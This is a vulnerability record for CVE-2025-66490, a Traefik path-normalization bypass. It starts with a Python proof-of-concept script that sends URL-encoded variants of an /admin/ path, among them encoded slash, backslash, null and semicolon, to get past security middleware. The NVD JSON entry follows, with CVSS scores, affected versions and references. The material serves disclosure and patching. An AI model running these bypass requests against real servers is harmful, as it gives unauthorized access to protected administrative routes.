CVE-2025-66490

# CVE-2025-66490 Traefik Path Normalization Bypass PoC # Affected: Traefik < 2.11.32, 2.11.31-3.6.2 # This PoC demonstrates bypassing /admin/ path protection using URL-encoded slash import requests import urllib.parse target = "http://mydomain.example.com" admin_path = "/admin/" encoded_bypass = "/admin%2F" # URL-encoded slash to bypass print("[*] CVE-2025-66490 Traefik Path Normalization Bypass PoC") print(f"[*] Target: {target}") # Normal request - should be blocked by security middleware print(f"\n[1] Sending normal request to {admin_path}") response1 = requests.get(f"{target}{admin_path}", timeout=10) print(f" Status: {response1.status_code}") # Bypass request - URL-encoded slash (%2F) may bypass middleware print(f"\n[2] Sending bypass request to {encoded_bypass}") response2 = requests.get(f"{target}{encoded_bypass}", timeout=10) print(f" Status: {response2.status_code}") # Additional encoded bypasses encoded_chars = { 'encoded_slash': '/admin%2F', 'encoded_backslash': '/admin%5C', 'encoded_null': '/admin%00', 'encoded_semicolon': '/admin%3B', 'encoded_question': '/admin%3F', 'encoded_hash': '/admin%23' } print("\n[3] Testing various URL-encoded bypasses:") for name, path in encoded_chars.items(): try: resp = requests.get(f"{target}{path}", timeout=10) print(f" {name}: Status {resp.status_code}") except Exception as e: print(f" {name}: Error - {e}") print("\n[*] If bypass succeeds, status codes may differ between normal and encoded requests") print("[*] Mitigation: Upgrade to Traefik 2.11.32 or 3.6.3+")

{"cve": {"id": "CVE-2025-66490", "sourceIdentifier": "[email protected]", "published": "2025-12-09T01:16:55.540", "lastModified": "2026-03-06T15:25:34.063", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Traefik is an HTTP reverse proxy and load balancer. For versions prior to 2.11.32 and 2.11.31 through 3.6.2, requests using PathPrefix, Path or PathRegex matchers can bypass path normalization. When Traefik uses path-based routing, requests containing URL-encoded restricted characters (/, \\, Null, ;, ?, #) can bypass the middleware chain and reach unintended backends. For example, a request to http://mydomain.example.com/admin%2F could reach service-a without triggering my-security-middleware, bypassing security controls for the /admin/ path. This issue is fixed in versions 2.11.32 and 3.6.3."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-436"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:traefik:traefik:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.11.32", "matchCriteriaId": "A212D168-0836-4D72-B2D9-9209C299471D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:traefik:traefik:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.0.0", "versionEndExcluding": "3.6.3", "matchCriteriaId": "0ED22672-D0CC-47CC-A70A-E270FDA55FBC"}]}]}], "references": [{"url": "https://github.com/traefik/traefik/releases/tag/v2.11.32", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/traefik/traefik/releases/tag/v3.6.4", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/traefik/traefik/security/advisories/GHSA-gm3x-23wp-hc2c", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/traefik/traefik/security/advisories/GHSA-gm3x-23wp-hc2c", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}